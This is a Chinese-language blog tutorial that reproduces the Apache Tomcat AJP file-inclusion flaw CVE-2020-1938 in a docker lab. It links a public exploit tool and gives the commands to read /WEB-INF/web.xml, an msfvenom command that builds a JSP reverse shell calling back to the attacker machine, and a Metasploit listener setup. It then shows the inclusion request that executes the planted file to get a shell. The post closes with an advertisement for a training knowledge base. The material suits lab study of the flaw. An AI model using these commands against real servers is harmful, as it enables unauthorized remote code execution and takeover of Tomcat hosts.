当前位置: 首页 > news >正文

【网络安全】Tomcat CVE-2020-1938 漏洞复现和利用过程_漏洞复现

一,漏洞描述
1-1 漏洞原理

Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接 和 SERVLET容器连接。

1-2 受影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.53
Apache Tomcat 9 < 9.0.31

二,靶场搭建

靶场:kali2023 192.168.1.160

攻击机器:kali2023 192.168.31.150

2- 1 拉去靶场镜像
docker pull duonghuuphuc/tomcat-8.5.32

2-2 启动镜像
docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32

2-3 访问

访问 192.168.31.160:8080 看到此页面说明靶场搭建成功了

三,漏洞复现

首先需要下载漏洞利用工具 ,网址如下(github)https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/

下载下来放到攻击机上(我的主机 kali2023 192.168.31.150)

名字很长,我改名了,叫CVE-2020-1938

cd 进入到文件里,可以看一下文件内容

接下来利用Tomcat-Root路径下文件读取(CVE-2020-1938)来读取服务器问价内容

注意把最后的红色IP地址换成你自己的靶场IP

python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160

python2 'Tomcat-ROOT路径下文件读取(CVE-2020-1938).py' -p 8009 -f /WEB-INF/web.xml 192.168.31.160

结果能成功读取到文件了,证明这里存在文件包含漏洞。

四,漏洞利用

我们如何getshell呢?

想要getshell则网站需要有文件上传的地方,这个靶场没有这个功能,不过我们可以模拟一下这个过程,我们手动复制木马文件到靶场服务器来模拟getshell过程

4-1 生成发现木马文件

注:真实环境中,在攻击器上生成木马,通过漏洞上传过去的

我在这里直接靶机 192.168.31.160上生成,复制到服务器目录中

kali上如下命令生成java木马文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.31.150 LPORT=8888 -f raw > aini_shell.txt

4-2 复制文件到服务器

先 docker ps 查看容器CONTAINER ID

然后进行复制

docker cp aini_shell.txt 525a39f3a85e:/usr/local/tomcat/webapps/ROOT/WEB-INF/

没有报错说明上传成功了

4-3 访问上传的木马文件

回到攻击器上

通过之前下载的POC访问一下,发现成功读取到了内容

但是我们目的是getshell,需要让反向shell执行才行

4-4 msf开启监听

先进入到msfconsole

msfconsole

use exploit/multi/handler set payload java/jsp_shell_reverse_tcp set lhost 192.168.31.150 ## 攻击器IP set lport 4444 ## 攻击器需要监听的端口(跟生成反向shell时设置的端口一样)

注:我监听8888端口一直失败,所以我换了个4444端口,并重新生成了连接192.168.31.150:4444端口的木马文件,复制到了靶场服务器上

开启监听成功

4-5 访问反向木马文件

最后一步:攻击主机访问木马文件,并编译执行,反向连接我们攻击主机

python2 'Tomcat-ROOT路径下文件包含(CVE-2020-1938).py' -p 8009 -f /WEB-INF/aini_shell.txt 192.168.31.160

注意:这俩文件作用不一样,'Tomcat-ROOT路径下文件包含…'是用来编译执行服务器代码,执行反向shell用的这个,也就是上面一步,让木马执行反向连接我们电脑

而Tomcat-ROOT路径下文件读取…'单纯的读取文件内容,而不会编译执行

说明服务器上上传的反向木马编译执行了

看看监听的窗口有没有拿到shell

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。

1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

http://www.jsqmd.com/news/268167/

相关文章:

  • 2026年阻燃晴氯纶纱定做厂家权威推荐榜单:阻燃晴天丝纱/阻燃晴氯纶26支/阻燃晴棉纱/竹纤维纱/天竹纤维纱源头厂家精选
  • BEATOZ区块链专业企业与韩国头部旅游集团MODETOUR从签署MOU迈向网络验证节点合作
  • Python标识符命名规范
  • MinerU如何验证提取质量?评估指标与人工校验结合
  • 2026年权威仪器设备校准/仪器外校/仪器校检/教学仪器校准/实验室通用仪器校准厂家实力推荐榜:CNAS认可实验室服务,专业第三方校准机构精选
  • 提升识别准确率的小技巧,万物识别实战经验分享
  • 2026企业智能升级指南:从Deepseek知识库部署服务商到本地BI私有化方案商全解析 - 品牌2026
  • Vivado下载失败怎么办?网络与防火墙问题实战案例
  • 救命神器!专科生毕业论文TOP9 AI论文平台测评
  • 长治市襄垣平顺黎城壶关英语雅思培训辅导机构推荐,2026权威出国雅思课程中心学校口碑排行榜 - 苏木2025
  • 2026年中山二手名包回收公司推荐榜:超奢名品回收黄金手表包包奢侈品,二手包包回收/二手手表回收/二手名表回收/二手黄金回收/回收二手名包/二手金条回收/二手回收二手名表/二手奢侈品回收公司精选
  • Qwen2.5-0.5B育儿建议:儿童成长指导系统
  • 0.1加0.2为什么不等于0.3
  • 从布局分析到元素识别|基于PaddleOCR-VL的全流程技术拆解
  • NewBie-image-Exp0.1与Mochi Diffusion对比:长尾特征生成能力评测
  • 小程序毕设选题推荐:基于springboot+微信小程序的考研刷题平台考研复习辅助平台【附源码、mysql、文档、调试+代码讲解+全bao等】
  • 如何通过工业智造超级智能体实现汽车制造工厂数字化转型
  • Youtu-2B影视创作:剧本构思与对白生成
  • 从零开始:用Qwen2.5-0.5B-Instruct打造个人AI助手
  • 【必学收藏】DeepSeek Engram新突破:通过可扩展查找实现条件记忆,开启大模型稀疏化新方向
  • Fun-ASR-MLT-Nano-2512语音模型压缩:量化与剪枝实战
  • 【收藏必学】AI大模型入行攻略:避开弯路,掌握实用技能,轻松入行
  • 快速掌握Android init.rc配置,启动脚本轻松集成
  • 必收藏!RAG与Agentic RAG全解析:从基础到进阶,解锁大模型实用能力
  • 2026年挂具脱漆炉推荐:鱼台光华环保科技挂具脱漆炉设备/原理/报价/定制全解析
  • vLLM部署HY-MT1.5-7B指南|高性能翻译模型落地实践
  • 腾讯云TI-ONE平台部署图片旋转判断模型指南
  • DeepSeek-R1-Distill-Qwen-1.5B部署省50%成本?真实案例分享
  • ADAS软件开发
  • 服务CPU突然飙到100%,用Arthas三分钟定位到问题代码